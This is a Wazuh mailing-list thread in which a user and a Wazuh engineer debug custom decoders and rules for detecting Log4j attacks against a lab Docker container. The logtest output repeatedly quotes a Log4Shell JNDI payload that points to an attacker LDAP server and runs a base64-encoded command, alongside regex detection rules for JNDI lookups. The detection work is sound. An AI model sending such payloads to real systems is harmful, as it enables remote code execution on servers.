Log4j ruleset detection
217 views
Skip to first unread message
Iman Mikhael
Dec 18, 2022, 5:09:14 AM12/18/22
to Wazuh mailing list
Hello,
I have configured rules and decoder to detect Log4j exploit on a docker container. However, there are not events received on Wazuh dashboard. However, I used 'tail' and logtest on the wazuh manager it shows that the logs have been received and decoded. This is the output f logtest:
**Phase 1: Completed pre-decoding.
full event: 'Dec 18 17:54:00 goldmouf-virtual-machine docker/vulnerable-app[1250]: 2022-12-18 09:54:00.434 INFO 1 --- [nio-8080-exec-2] HelloWorld : Received a request for API version ${jndi:ldap://192.168.36.129:1389/Basic/Command/Base64/ZWNobyAndGhpcyBpcyBkYW5nZXJvdXMgZmlsZScgPiAvdG1wL21hbHdhcmVlLnR4dAo=}'
timestamp: 'Dec 18 17:54:00'
hostname: 'goldmouf-virtual-machine'
program_name: 'docker/vulnerable-app'
**Phase 2: Completed decoding.
name: 'docker_log_decoder'
date: '//192'
srcip: '192.168.36.129'
time: '09:54:00'
This shows that the ruleset did not detect the event right?
Thank You, Regards.
Julian Bustamante Narvaez
Dec 18, 2022, 3:34:13 PM12/18/22
to Wazuh mailing list
Hi, I hope you are well, can you tell me what version of wazuh do you use?
Can you send me the ossec.conf file and what rules and decoders do you have configured?
You can also send me the complete fulllog that you use for the test in the logtest.
Regards
Can you send me the ossec.conf file and what rules and decoders do you have configured?
You can also send me the complete fulllog that you use for the test in the logtest.
Did you use any guide like this to configure Log4j?
Iman Mikhael
Dec 18, 2022, 9:26:23 PM12/18/22
to Wazuh mailing list
Hi Julian, Thank you for responding,
I am using Wazuh version 4.3.10 using the OVA installation. In the ossec.conf file on my agent, I added this:
<localfile>
<log_format>syslog</log_format>
<location>/var/log/docker/*</location>
</localfile>
<log_format>syslog</log_format>
<location>/var/log/docker/*</location>
</localfile>
In the ossec.conf file of the wazuh manager the only change made is I changed no in the 'logall_json' to yes and the rest is as default:
<logall_json>yes</logall_json>
The rule I hav configured is exactly the one from the link you gave:
<group name="log4j, attack,">
<rule id="110002" level="7">
<if_group>web|accesslog|attack</if_group>
<regex type="pcre2">(?i)(((\$|24)\S*)((\{|7B)\S*)((\S*j\S*n\S*d\S*i))|JHtqbmRp)</regex>
<description>Possible Log4j RCE attack attempt detected.</description>
<mitre>
<id>T1190</id>
<id>T1210</id>
<id>T1211</id>
</mitre>
</rule>
<rule id="110003" level="12">
<if_sid>110002</if_sid>
<regex type="pcre2">ldap[s]?|rmi|dns|nis|iiop|corba|nds|http|lower|upper|(\$\{\S*\w\}\S*)+</regex>
<description>Log4j RCE attack attempt detected.</description>
<mitre>
<id>T1190</id>
<id>T1210</id>
<id>T1211</id>
</mitre>
</rule>
</group>
The decoders I have configured is from this link https://wazuh.com/blog/monitoring-docker-container-logs-with-wazuh/ :
<decoder name="docker_log_decoder">
<program_name>^docker</program_name>
</decoder>
<decoder name="docker_log_decoder_2">
<parent>docker_log_decoder</parent>
<regex offset="after_parent">(\d*.\d*.\d*.\d*)</regex>
<order>srcip</order>
</decoder>
<decoder name="docker_log_decoder_2">
<parent>docker_log_decoder</parent>
<regex offset="after_parent">(\d*/\w*/\d*)</regex>
<order>date</order>
</decoder>
<decoder name="docker_log_decoder_2">
<parent>docker_log_decoder</parent>
<regex offset="after_parent">(\d*:\d*:\d*)</regex>
<order>time</order>
</decoder>
<decoder name="docker_log_decoder_2">
<parent>docker_log_decoder</parent>
<regex offset="after_parent">("\w*\s/\s\w*/\d.\d"\s\d*)</regex>
<order>web_action</order>
</decoder>
The fulllog I used for the logtest is :
Dec 18 17:54:00 goldmouf-virtual-machine docker/vulnerable-app[1250]: 2022-12-18 09:54:00.434 INFO 1 --- [nio-8080-exec-2] HelloWorld : Received a request for API version ${jndi:ldap://192.168.36.129:1389/Basic/Command/Base64/ZWNobyAndGhpcyBpcyBkYW5nZXJvdXMgZmlsZScgPiAvdG1wL21hbHdhcmVlLnR4dAo=}
Another info is I also tested using:
And you can see the results in the images attached. Hope to hear from you soon.
Thank you, Regards.
Julian Bustamante Narvaez
Dec 19, 2022, 6:12:14 PM12/19/22
to Wazuh mailing list
Hi, testing with the decoders and rules you sent me, I couldn't get TEST WEB SERVER or TEST POC to work. Not being able to replicate the one that works for you, I couldn't see what decoder and rule you use to match via web|accesslog|attack.
Do I need an additional decoder or rule?
can you try the logtest with the -v flag and send me your output.?
I also saw that the date is wrong, because the logs are different, and they must be different decoders, I leave you a possible solution.
<order>date</order>
</decoder>
<decoder name="docker_log_decoder_2">
<parent>docker_log_decoder</parent>
Can you send me the full log that works?
Send me please everything in text and not just in image.
Regards
Do I need an additional decoder or rule?
can you try the logtest with the -v flag and send me your output.?
I also saw that the date is wrong, because the logs are different, and they must be different decoders, I leave you a possible solution.
<decoder name="docker_log_decoder_2">
<parent>docker_log_decoder</parent>
<parent>docker_log_decoder</parent>
<regex offset="after_parent">(\d+/\w+/\d+)</regex>
<order>date</order>
</decoder>
<decoder name="docker_log_decoder_2">
<parent>docker_log_decoder</parent>
<regex offset="after_parent">(\d+-\w+-\d+)</regex>
<order>date</order>
</decoder>
<order>date</order>
</decoder>
Send me please everything in text and not just in image.
Regards
Iman Mikhael
Dec 23, 2022, 4:39:11 AM12/23/22
to Wazuh mailing list
Hi Julian,
Sorry for the late response, been busy with exams. Firstly, I only run the logtest from the UI because I cannot paste strings from external source into the manager's CLI.
This is the full log that triggered the Log4j rule:
192.168.36.1 - - [23/Dec/2022:17:22:17 +0800] "GET /favicon.ico HTTP/1.1" 404 492 "http://192.168.36.135/?x=${jndi:ldap://${localhost}.{{test}}/a}" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
This is the output of the logtest of the log above:
**Phase 1: Completed pre-decoding.
full event: '192.168.36.1 - - [23/Dec/2022:17:22:17 +0800] "GET /favicon.ico HTTP/1.1" 404 492 "http://192.168.36.135/?x=${jndi:ldap://${localhost}.{{test}}/a}" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"'
**Phase 2: Completed decoding.
name: 'web-accesslog'
id: '404'
protocol: 'GET'
srcip: '192.168.36.1'
url: '/favicon.ico'
**Phase 3: Completed filtering (rules).
id: '110003'
level: '12'
description: 'Log4j RCE attack attempt detected.'
groups: '["log4j"," attack"]'
firedtimes: '1'
mail: 'true'
mitre.id: '["T1190","T1210","T1211"]'
mitre.tactic: '["Initial Access","Lateral Movement","Defense Evasion"]'
mitre.technique: '["Exploit Public-Facing Application","Exploitation of Remote Services","Exploitation for Defense Evasion"]'
**Alert to be generated.
This is the decoder in 0375-web-accesslog_decoders.xml that matched with the log:
<decoder name="web-accesslog">
<type>web-log</type>
<program_name>nginx|apache</program_name>
</decoder>
<decoder name="web-accesslog">
<type>web-log</type>
<prematch>^\S+ \S+ \S+ \.*[\S+ \S\d+] "\w+ \S+ HTTP\S+" </prematch>
</decoder>
<decoder name="web-accesslog-domain">
<type>web-log</type>
<parent>web-accesslog</parent>
<prematch>^\S+.\D+</prematch>
<regex>^\S+ (\S+) \S+ \.*[\S+ \S\d+] "(\w+) (\S+) HTTP\S+" (\d+) </regex>
<order>srcip, protocol, url, id</order>
</decoder>
<decoder name="web-accesslog-ip-ip">
<type>web-log</type>
<parent>web-accesslog</parent>
<prematch>^\S+ \S+.\S+ |^\S+ \S+:\S+ </prematch>
<regex>^(\S+) (\S+) \S+ \.*[\S+ \S\d+] "(\w+) (\S+) HTTP\S+" (\d+) </regex>
<order>srcip2, srcip, protocol, url, id</order>
</decoder>
<decoder name="web-accesslog-ip">
<type>web-log</type>
<parent>web-accesslog</parent>
<regex>^(\S+) \S+ \S+ \.*[\S+ \S\d+] "(\w+) (\S+) HTTP\S+" (\d+) </regex>
<order>srcip, protocol, url, id</order>
</decoder>
<decoder name="web-accesslog-glpi">
<type>web-log</type>
<parent>web-accesslog</parent>
<prematch>^\S+ - - [\d+/\w+/\d+:\d+:\d+:\d+ +\d+] "\S+ \S+ HTTP/\.+"</prematch>
<regex>^(\S+) - - [(\d+/\w+/\d+:\d+:\d+:\d+) +\d+] "(\S+) (\S+) HTTP/(\.+)" (\d+) (\S+) "(\.+)" "(\.+)"</regex>
<order>srcip,timestamp,operation, route, http_version, rcode, rsize, url, browser</order>
</decoder>
<type>web-log</type>
<program_name>nginx|apache</program_name>
</decoder>
<decoder name="web-accesslog">
<type>web-log</type>
<prematch>^\S+ \S+ \S+ \.*[\S+ \S\d+] "\w+ \S+ HTTP\S+" </prematch>
</decoder>
<decoder name="web-accesslog-domain">
<type>web-log</type>
<parent>web-accesslog</parent>
<prematch>^\S+.\D+</prematch>
<regex>^\S+ (\S+) \S+ \.*[\S+ \S\d+] "(\w+) (\S+) HTTP\S+" (\d+) </regex>
<order>srcip, protocol, url, id</order>
</decoder>
<decoder name="web-accesslog-ip-ip">
<type>web-log</type>
<parent>web-accesslog</parent>
<prematch>^\S+ \S+.\S+ |^\S+ \S+:\S+ </prematch>
<regex>^(\S+) (\S+) \S+ \.*[\S+ \S\d+] "(\w+) (\S+) HTTP\S+" (\d+) </regex>
<order>srcip2, srcip, protocol, url, id</order>
</decoder>
<decoder name="web-accesslog-ip">
<type>web-log</type>
<parent>web-accesslog</parent>
<regex>^(\S+) \S+ \S+ \.*[\S+ \S\d+] "(\w+) (\S+) HTTP\S+" (\d+) </regex>
<order>srcip, protocol, url, id</order>
</decoder>
<decoder name="web-accesslog-glpi">
<type>web-log</type>
<parent>web-accesslog</parent>
<prematch>^\S+ - - [\d+/\w+/\d+:\d+:\d+:\d+ +\d+] "\S+ \S+ HTTP/\.+"</prematch>
<regex>^(\S+) - - [(\d+/\w+/\d+:\d+:\d+:\d+) +\d+] "(\S+) (\S+) HTTP/(\.+)" (\d+) (\S+) "(\.+)" "(\.+)"</regex>
<order>srcip,timestamp,operation, route, http_version, rcode, rsize, url, browser</order>
</decoder>
Meanwhile, the full log below is a log4j exploit which is successful because remote code execution was carried out but the rule was not triggered:
This is the full log that did not trigger the rule:
Dec 18 17:54:00 goldmouf-virtual-machine docker/vulnerable-app[1250]: 2022-12-18 09:54:00.434 INFO 1 --- [nio-8080-exec-2] HelloWorld : Received a request for API version ${jndi:ldap://192.168.36.129:1389/Basic/Command/Base64/ZWNobyAndGhpcyBpcyBkYW5nZXJvdXMgZmlsZScgPiAvdG1wL21hbHdhcmVlLnR4dAo=}
This is the output of the logtest of the log above:
**Messages:
WARNING: (7003): '507fa2da' token expires
INFO: (7202): Session initialized with token '2da14981'
**Phase 1: Completed pre-decoding.
full event: 'Dec 18 17:54:00 goldmouf-virtual-machine docker/vulnerable-app[1250]: 2022-12-18 09:54:00.434 INFO 1 --- [nio-8080-exec-2] HelloWorld : Received a request for API version ${jndi:ldap://192.168.36.129:1389/Basic/Command/Base64/ZWNobyAndGhpcyBpcyBkYW5nZXJvdXMgZmlsZScgPiAvdG1wL21hbHdhcmVlLnR4dAo=}'
timestamp: 'Dec 18 17:54:00'
hostname: 'goldmouf-virtual-machine'
program_name: 'docker/vulnerable-app'
**Phase 2: Completed decoding.
name: 'docker_log_decoder'
date: '2022-12-18'
srcip: '192.168.36.129'
time: '09:54:00'
This is the decoder written in local_decoder.xml that matched with the full log but did not trigger the rule:
<decoder name="docker_log_decoder">
<program_name>^docker</program_name>
</decoder>
<decoder name="docker_log_decoder_2">
<parent>docker_log_decoder</parent>
<regex offset="after_parent">(\d*.\d*.\d*.\d*)</regex>
<order>srcip</order>
</decoder>
<decoder name="docker_log_decoder_2">
<parent>docker_log_decoder</parent>
<program_name>^docker</program_name>
</decoder>
<decoder name="docker_log_decoder_2">
<parent>docker_log_decoder</parent>
<regex offset="after_parent">(\d*.\d*.\d*.\d*)</regex>
<order>srcip</order>
</decoder>
<decoder name="docker_log_decoder_2">
<parent>docker_log_decoder</parent>
<regex offset="after_parent">(\d+-\w+-\d+)</regex>
<order>date</order>
</decoder>
<order>date</order>
</decoder>
<decoder name="docker_log_decoder_2">
<parent>docker_log_decoder</parent>
<regex offset="after_parent">(\d*:\d*:\d*)</regex>
<order>time</order>
</decoder>
<decoder name="docker_log_decoder_2">
<parent>docker_log_decoder</parent>
<regex offset="after_parent">("\w*\s/\s\w*/\d.\d"\s\d*)</regex>
<order>web_action</order>
</decoder>
<parent>docker_log_decoder</parent>
<regex offset="after_parent">(\d*:\d*:\d*)</regex>
<order>time</order>
</decoder>
<decoder name="docker_log_decoder_2">
<parent>docker_log_decoder</parent>
<regex offset="after_parent">("\w*\s/\s\w*/\d.\d"\s\d*)</regex>
<order>web_action</order>
</decoder>
This is the rule written in local_rules.xml that triggered the exploit on webserver but not on the docker container:
<group name="log4j, attack,">
<rule id="110002" level="7">
<if_group>web|accesslog|attack</if_group>
<regex type="pcre2">(?i)(((\$|24)\S*)((\{|7B)\S*)((\S*j\S*n\S*d\S*i))|JHtqbmRp)</regex>
<description>Possible Log4j RCE attack attempt detected.</description>
<mitre>
<id>T1190</id>
<id>T1210</id>
<id>T1211</id>
</mitre>
</rule>
<rule id="110003" level="12">
<if_sid>110002</if_sid>
<regex type="pcre2">ldap[s]?|rmi|dns|nis|iiop|corba|nds|http|lower|upper|(\$\{\S*\w\}\S*)+</regex>
<description>Log4j RCE attack attempt detected.</description>
<mitre>
<id>T1190</id>
<id>T1210</id>
<id>T1211</id>
</mitre>
</rule>
</group>
<rule id="110002" level="7">
<if_group>web|accesslog|attack</if_group>
<regex type="pcre2">(?i)(((\$|24)\S*)((\{|7B)\S*)((\S*j\S*n\S*d\S*i))|JHtqbmRp)</regex>
<description>Possible Log4j RCE attack attempt detected.</description>
<mitre>
<id>T1190</id>
<id>T1210</id>
<id>T1211</id>
</mitre>
</rule>
<rule id="110003" level="12">
<if_sid>110002</if_sid>
<regex type="pcre2">ldap[s]?|rmi|dns|nis|iiop|corba|nds|http|lower|upper|(\$\{\S*\w\}\S*)+</regex>
<description>Log4j RCE attack attempt detected.</description>
<mitre>
<id>T1190</id>
<id>T1210</id>
<id>T1211</id>
</mitre>
</rule>
</group>
The exploit that I am trying to get alerts on wazuh is exactly as in this link: https://thesecmaster.com/how-does-the-log4j-vulnerability-work-in-practical/
Regards,
Julian Bustamante Narvaez
Dec 26, 2022, 2:26:22 PM12/26/22
to Iman Mikhael, Wazuh mailing list
Hi,
The alert is not generated because the if_group is not set, the group is assigned by a rule, so you have to create another rule and assign the group to it.
<group name="log4j, attack,">
<rule id="110001" level="0">
<decoded_as>docker_log_decoder</decoded_as>
<group>web</group>
<description>custom docker log decoder </description>
</rule>
<decoded_as>docker_log_decoder</decoded_as>
<group>web</group>
<description>custom docker log decoder </description>
</rule>
<rule id="110002" level="7">
<if_group>web|accesslog|attack</if_group>
<regex type="pcre2">(?i)(((\$|24)\S*)((\{|7B)\S*)((\S*j\S*n\S*d\S*i))|JHtqbmRp)</regex>
<description>Possible Log4j RCE attack attempt detected.</description>
<mitre> <id>T1190</id>
<id>T1210</id>
<id>T1211</id>
</mitre>
</rule>
<rule id="110003" level="12">
<if_sid>110002</if_sid>
<regex type="pcre2">ldap[s]?|rmi|dns|nis|iiop|corba|nds|http|lower|upper|(\$\{\S*\w\}\S*)+</regex>
<description>Log4j RCE attack attempt detected.</description>
<mitre> <id>T1190</id> <id>T1210</id> <id>T1211</id> </mitre>
</rule>
</group>
<if_group>web|accesslog|attack</if_group>
<regex type="pcre2">(?i)(((\$|24)\S*)((\{|7B)\S*)((\S*j\S*n\S*d\S*i))|JHtqbmRp)</regex>
<description>Possible Log4j RCE attack attempt detected.</description>
<mitre> <id>T1190</id>
<id>T1210</id>
<id>T1211</id>
</mitre>
</rule>
<rule id="110003" level="12">
<if_sid>110002</if_sid>
<regex type="pcre2">ldap[s]?|rmi|dns|nis|iiop|corba|nds|http|lower|upper|(\$\{\S*\w\}\S*)+</regex>
<description>Log4j RCE attack attempt detected.</description>
<mitre> <id>T1190</id> <id>T1210</id> <id>T1211</id> </mitre>
</rule>
</group>
after restart manager, the output of the logtest is:
# /var/ossec/bin/wazuh-logtest
Starting wazuh-logtest v4.5.0
Type one log per line
Starting wazuh-logtest v4.5.0
Type one log per line
Dec 18 17:54:00 goldmouf-virtual-machine docker/vulnerable-app[1250]: 2022-12-18 09:54:00.434 INFO 1 --- [nio-8080-exec-2] HelloWorld : Received a request for API version ${jndi:ldap://192.168.36.129:1389/Basic/Command/Base64/ZWNobyAndGhpcyBpcyBkYW5nZXJvdXMgZmlsZScgPiAvdG1wL21hbHdhcmVlLnR4dAo=}
**Phase 1: Completed pre-decoding.
full event: 'Dec 18 17:54:00 goldmouf-virtual-machine docker/vulnerable-app[1250]: 2022-12-18 09:54:00.434 INFO 1 --- [nio-8080-exec-2] HelloWorld : Received a request for API version ${jndi:ldap://192.168.36.129:1389/Basic/Command/Base64/ZWNobyAndGhpcyBpcyBkYW5nZXJvdXMgZmlsZScgPiAvdG1wL21hbHdhcmVlLnR4dAo=}'
timestamp: 'Dec 18 17:54:00'
hostname: 'goldmouf-virtual-machine'
program_name: 'docker/vulnerable-app'
**Phase 2: Completed decoding.
name: 'docker_log_decoder'
date: '2022-12-18'
srcip: '192.168.36.129'
time: '09:54:00'
full event: 'Dec 18 17:54:00 goldmouf-virtual-machine docker/vulnerable-app[1250]: 2022-12-18 09:54:00.434 INFO 1 --- [nio-8080-exec-2] HelloWorld : Received a request for API version ${jndi:ldap://192.168.36.129:1389/Basic/Command/Base64/ZWNobyAndGhpcyBpcyBkYW5nZXJvdXMgZmlsZScgPiAvdG1wL21hbHdhcmVlLnR4dAo=}'
timestamp: 'Dec 18 17:54:00'
hostname: 'goldmouf-virtual-machine'
program_name: 'docker/vulnerable-app'
**Phase 2: Completed decoding.
name: 'docker_log_decoder'
date: '2022-12-18'
srcip: '192.168.36.129'
time: '09:54:00'
**Phase 3: Completed filtering (rules).
id: '110003'
level: '12'
description: 'Log4j RCE attack attempt detected.'
groups: '['log4j', ' attack']'
firedtimes: '1'
id: '110003'
level: '12'
description: 'Log4j RCE attack attempt detected.'
groups: '['log4j', ' attack']'
firedtimes: '1'
mail: 'True'
mitre.id: '['T1190', 'T1210', 'T1211']'
mitre.tactic: '['Initial Access', 'Lateral Movement', 'Defense Evasion']'
mitre.technique: '['Exploit Public-Facing Application', 'Exploitation of Remote Services', 'Exploitation for Defense Evasion']'
**Alert to be generated.
using flag -v ( /var/ossec/bin/wazuh-logtest -v ) you can see that sequence is as follows:
Trying rule: 110001 - custom docker log decoder
*Rule 110001 matched
*Trying child rules
Trying rule: 110002 - Possible Log4j RCE attack attempt detected.
*Rule 110002 matched
*Trying child rules
Trying rule: 110003 - Log4j RCE attack attempt detected.
*Rule 110003 matched
*Rule 110001 matched
*Trying child rules
Trying rule: 110002 - Possible Log4j RCE attack attempt detected.
*Rule 110002 matched
*Trying child rules
Trying rule: 110003 - Log4j RCE attack attempt detected.
*Rule 110003 matched
I hope this was useful.
Regards
--
You received this message because you are subscribed to a topic in the Google Groups "Wazuh mailing list" group.
To unsubscribe from this topic, visit https://groups.google.com/d/topic/wazuh/DY8brh9TUiM/unsubscribe.
To unsubscribe from this group and all its topics, send an email to wazuh+un...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/wazuh/e3d17348-b06d-4d3d-bb80-9b517f182ce1n%40googlegroups.com.
Iman Mikhael
Dec 29, 2022, 10:42:43 PM12/29/22
to Julian Bustamante Narvaez, Wazuh mailing list
Hello Julian,
I tested it and it works! This was very useful. However, I would like to know more about the lines of codes you added in the ruleset. Is it to direct the rule to the docker log decoder?
Regards.
Julian Bustamante Narvaez
Jan 16, 2023, 7:59:33 AM1/16/23
to Wazuh mailing list
Hi, Sorry for the late reply, I was away for a few days.
yes, the first stage is
<decoder name="docker_log_decoder">
<program_name>^docker</program_name>
</decoder>
if it matches, decode with docker_log_decoder, start rule 110001 and then set the group, the level is equal to 0, then the alert is not generated, but allows to start rule 110002 which will generate the alert.
<rule id="110001" level="0">
<decoded_as>docker_log_decoder</decoded_as>
<group>web</group>
<description>custom docker log decoder</description>
</rule>
Regards.
yes, the first stage is
<decoder name="docker_log_decoder">
<program_name>^docker</program_name>
</decoder>
<rule id="110001" level="0">
<decoded_as>docker_log_decoder</decoded_as>
<group>web</group>
<description>custom docker log decoder</description>
</rule>
Reply all
Reply to author
Forward
0 new messages